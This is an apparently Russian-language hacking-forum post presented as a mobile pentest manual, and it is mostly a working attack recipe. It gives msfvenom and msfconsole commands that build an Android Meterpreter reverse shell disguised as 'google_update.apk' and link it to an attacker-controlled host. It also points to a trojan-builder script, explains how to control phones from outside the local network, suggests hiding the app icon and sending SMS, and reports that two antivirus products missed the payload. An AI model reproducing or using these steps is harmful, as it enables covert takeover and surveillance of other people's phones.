Вcтупление. # cd/sdcard # msfvenom -p android/meterpreter/reverce_tcp lhost=192.168.1.45 lport=443 R > google_update.apk # msfconsole # use exploit/multi/handler # set payload android/meterpreter/reverse_tcp # set lhost 192.168.1.45 # set lport 443 # exploit meterpreter > Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org. Ссылки в рамках данного мануала не являются рекламой. Но не все так просто. Не зря выше я написал про "примерно" и "определенные условия". Я часто читаю комментарии под видео на YouTube от кретинов: "Автор мудак, ничего не объясняет, просто пишет команды в консоли". А вы думали вас еще бесплатно кто-то учить с 0 будет? Это вам не школа, сука. Нету никакой кнопки "ВЫСЛЕДИТЬ ПО IP И ВЗЛОМАТЬ" Честно говоря есть еще один путь - собрать троян самостоятельно 1 Для начала ставим зависимости, metasploit-framework, xterm, Zenity, Aapt, Apktool, Zipalign, (если apt-get install не находит пакет, пишем название с маленькой буквы) https://github.com/CorpOfHack/Evil-Droid-RU/ 1. запускаем скрипт: # ./evil-droid https://camo.githubusercontent.com/e12925f438900d70d5b5ae961a2c7a3eed0ef17f/68747470733a2f2f692e696d6775722e636f6d2f774372364859712e706e67 [SIZE=5]Вопрос: "Как управлять устройством не из локальной сети, а из глобальной?[/SIZE] В качестве LHOST используйте свой публичный IP, payload необходимо выбрать reverse_https, LPORT=443, и пробросить порт на роутере 443 на локальный адрес Kali [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff]Напомню, что разрешения, которые запрашивает приложение при установке, могут вызвать подозрения у пользователя. Так же советую подробно изучить Android-опции в meterpreter (например hide_app_icon, send_sms) и поработать со скриптом из под NetHunter. По результатам моих тестов на реальном устройстве DrWeb и Avast ничего не заметили(я про активную защиту, что будет при сканировании не смотрел).[/COLOR][/SIZE][/FONT][/COLOR][/SIZE][/COLOR][/SIZE][/COLOR][/SIZE] [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff][I]P.S. [I][I][I]Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.[/I][/I][/I][/I][/COLOR][/SIZE][/FONT][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE] [SIZE=5][COLOR=#ffffff][SIZE=5][COLOR=#ffffff][COLOR=#ffffff][FONT=Courier New][SIZE=5][COLOR=#ffffff][I]P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.[/I][/COLOR][/SIZE][/FONT][/COLOR][/COLOR][/SIZE][/COLOR][/SIZE]